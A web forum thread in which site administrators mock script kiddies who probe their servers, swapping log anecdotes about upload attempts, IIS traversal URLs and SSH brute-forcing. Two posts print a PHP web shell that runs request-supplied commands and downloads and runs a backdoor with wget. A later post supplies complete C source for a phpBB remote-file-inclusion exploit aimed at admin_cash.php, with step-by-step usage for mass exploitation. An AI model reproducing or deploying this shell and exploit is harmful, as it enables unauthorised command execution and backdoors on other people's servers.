1'm b4b0, w4tch m3 hax0r
-
From David ...
I have a form on my web page which allows users to upload files to it (wolever.net/Uploads), and I frequently get people uploading files like exploit.php, which are promptly piped to /dev/null. Of corse, there are a few people who try uploading exploit.html and hoping its parsed as PHP (which, of corse, its not) and I have had a couple of attempts to over write mod_autoindex with custom index.html files... also failures. This is one script I found particularly interesting thou...
<FONT color=#0000ff>[b4b0.html]</FONT>
<FONT face="Courier New">b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x gota1;./gota1"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();:
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
</FONT><FONT color=#0000ff>[/b4b0.html]</FONT>Note the line which says EDIT THIS INFO.
-
That's great .... quite a hacker!
-
People seem to thinks that this URL will work to hack my apache on a Linux box...
/scripts/..%255c%255c../winnt/system32/cmd.exe
hmm yeah right.
Also they try the Too Long URL exploit that works on old versions of IIS... LOL
Drak
-
@Drak said:
People seem to thinks that this URL will work to
Those are just scripted worm
hack my apache on a Linux box...
attacks so they are just "trying their luck".
-
L053r5 is what they are [:P]
Almost all are probably kiddies on the same provider as I am anyway.
Drak
-
Also, it is possible with many web services (www, smtp, whatever) to
put whatever "banner" string they want for incoming connections.
So therefore, people have IIS installs saying they are apache, and vice
versa. As a result of this, port scanners and script kiddie tools
generally have options to ignore host banners and attempt all known
exploits of ANY provider on that port.
-
As far as server logs go, I used to look at my apache log with
amusement, seeing many entries like the one mentioned above. I'm
pretty confident in my apache install, so I really don't even look at
that file anymore...
The other entertaining log is the SSH connection log. On a daily
basis, 1 or more people using spoofed IP addresses attempt to log in
with a static set of about 20 usernames and passwords. Same 20
every time. It has to be part of some script kiddie toolkit or
something, since I can't imagine the same person trying the same
combination every day to see if maybe I finally DID create a user named
"admin" with a password of "password". This has been
ongoing for over a year.
-
I love this guy: http://www.gulftech.org/tools/base64.pl
Not only is he referring to Base64 "Encryption", he also logs everyones conversions into a file in /tools/. Some of the things people are "Encrypting" are pretty funny ;)
-
Actually, Blue, I didn't take the lines from my log file. It's number 20 of the 20 most often requested non-existant pages in my statistics. [:D]
I remember killing off my FTP server because 2 people were doing a hack attempt using things like 'administrator,system' etc as username and password. I reported their IP to their ISP and the got an official warning. If they ever do it again their connection will be terminated. Muhahaha. That'll teach them.
Drak
-
You're lucky in that regard - my script kiddies spoof their IP address, so I have no idea who to complain to...
About 6 months ago, I saw some that did appear to reverse-map, and did
complain. Never got a single response from any of the ISPs I
contacted. (none were major ISPs)
-
In my case it probably helped having th emost expensive non-business subscription for my ISP.
Hey any clue to find out from the apache logs where all the hits to an image that I USED to have, but no longer have, are coming from? I think someone has used it on a forum as an avatar, but I cannot seem to find it on any of the referring pages that I can see in the statistics.
Drak
-
I don't know of any tool that does it, but if you know the image
filename, it should be quite easy. Do an egrep using a regular
expression that either includes all lines with that image filename, or
to be more specific, lines with that image filename and a 404 result.
HTH
-
Hello,
Here is what it actually is from b4b0-phpBB.tgz This is a phpBB cashmod exploit. You also might wanna do some research on bahbo be for you start jumping to conclusions.. Who ever attempted to use this on you was a moron and should not be allowed to use a computer....
Cheers,
evilrabbi
/* b4b0.php */
b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
/* code for mass exploitation */
<FONT size=2>/*
exploit for phpBB 1.0.0 - 2.0.10
edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to
a webserver.
gcc -o b4b0-phpbb b4b0-phpbb.c
./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>
telnet <url_of_exploited_system> <port_of_back_door>
greets to b4b0
-- evilrabbi
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
int sockfd, buff;
char buffer[1024];
char *request;
if(argc != 4 ) {
help(argv[0]);
exit(0);
}
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(1024);
trg.sin_family = AF_INET;
trg.sin_port = htons(80);
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));
sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]);
send(sockfd,request,strlen(request),0);
buff=recv(sockfd, buffer, 1024-1, 0);
buffer[buff] = '\0';
printf("%s",buffer);
close(sockfd);
return 0;
}
void help(char *program_name) {
printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n");
printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name);
printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name);
}
</FONT></FONT>